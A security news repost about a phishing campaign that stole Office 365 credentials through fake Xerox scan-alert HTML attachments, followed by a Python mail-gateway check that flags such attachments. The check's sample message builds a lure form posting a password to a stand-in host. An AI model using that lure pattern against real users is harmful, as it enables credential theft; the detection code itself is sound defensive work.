Friday, February 26, 03:54

Microsoft Office 365 employee passwords leaked online!

A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to more than a thousand corporate employees.

The cyber-attack is said to have taken place in August last year, targeting energy and construction companies, Check Point Research researchers said today in a joint analysis with industrial security company Otorio.


Although phishing campaigns designed to steal credentials are among the most common causes of data breaches, what makes this campaign stand out is a failure on the attackers' part that led them to inadvertently expose the credentials they had stolen on the Internet.

"With a simple Google search, anyone could find the password of a compromised email," the researchers said.

The attack started with phishing emails posing as Xerox (or Xeros) scan alerts that carried an HTML file attachment which, when opened, prompted users to enter their Office 365 passwords on a fake login page. The passwords were then extracted and sent to a remote server in a text file.

The researchers noted that the JavaScript code used to exfiltrate the credentials was constantly corrected and refined, to the point of evading most antivirus products and creating a "realistic" user experience so that victims would provide their login details.

To this end, the campaign relied on a combination of specialized infrastructure and compromised WordPress servers that the attackers used to store credentials.

The fact that the stolen credentials were stored in specific text files on these servers also means that search engines like Google could index these pages and make them accessible to any malicious actor looking for stolen passwords with an easy search.

In addition, by analyzing the different email headers used in this campaign, the researchers concluded that the emails were sent from a Linux server hosted on the Microsoft Azure platform.

To mitigate these threats, users are advised to be wary of emails received from unknown senders and not to click on suspicious links.
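A mail-gateway style check for the HTML-attachment lure described above, as an added example that is not from the researchers' analysis or the original article: it flags HTML attachments that contain a password field together with script or a remote form target. The sample message, the host `collector.example` and all function names are constructed for illustration.

```python
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse


class LoginFormScan(HTMLParser):
    """Collects the traits of a credential-harvesting page."""
    def __init__(self):
        super().__init__()
        self.password_fields, self.scripts = 0, 0
        self.remote_hosts = set()

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        if tag == "script":
            self.scripts += 1
        if tag in ("form", "script"):  # where does the data or code go?
            for key in ("action", "src"):
                host = urlparse(a.get(key) or "").netloc.lower()
                if host:
                    self.remote_hosts.add(host)


def scan_message(msg):
    """Return one finding per HTML attachment that asks for a password."""
    findings = []
    for part in msg.walk():
        name = (part.get_filename() or "").lower()
        if not name.endswith((".htm", ".html")):
            continue
        html = part.get_payload(decode=True).decode("utf-8", "replace")
        scan = LoginFormScan()
        scan.feed(html)
        if scan.password_fields and (scan.scripts or scan.remote_hosts):
            findings.append({"file": name, "remote_hosts": sorted(scan.remote_hosts)})
    return findings


def sample_message():
    """Constructed sample: a scan alert with two HTML attachments."""
    msg = EmailMessage()
    msg.set_content("Your scanned document is attached.")
    lure = ('<form action="https://collector.example/p" method="post">'
            '<input type="password" name="p"></form><script></script>')
    msg.add_attachment(lure, subtype="html", filename="scan.htm")
    msg.add_attachment("<p>report</p>", subtype="html", filename="report.html")
    return msg
```

A legitimate scanner notification has no reason to ship a password form, so a hit here is a good candidate for quarantine or for stripping the attachment before delivery.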

Source of information: thehackernews.com


Teo Ehc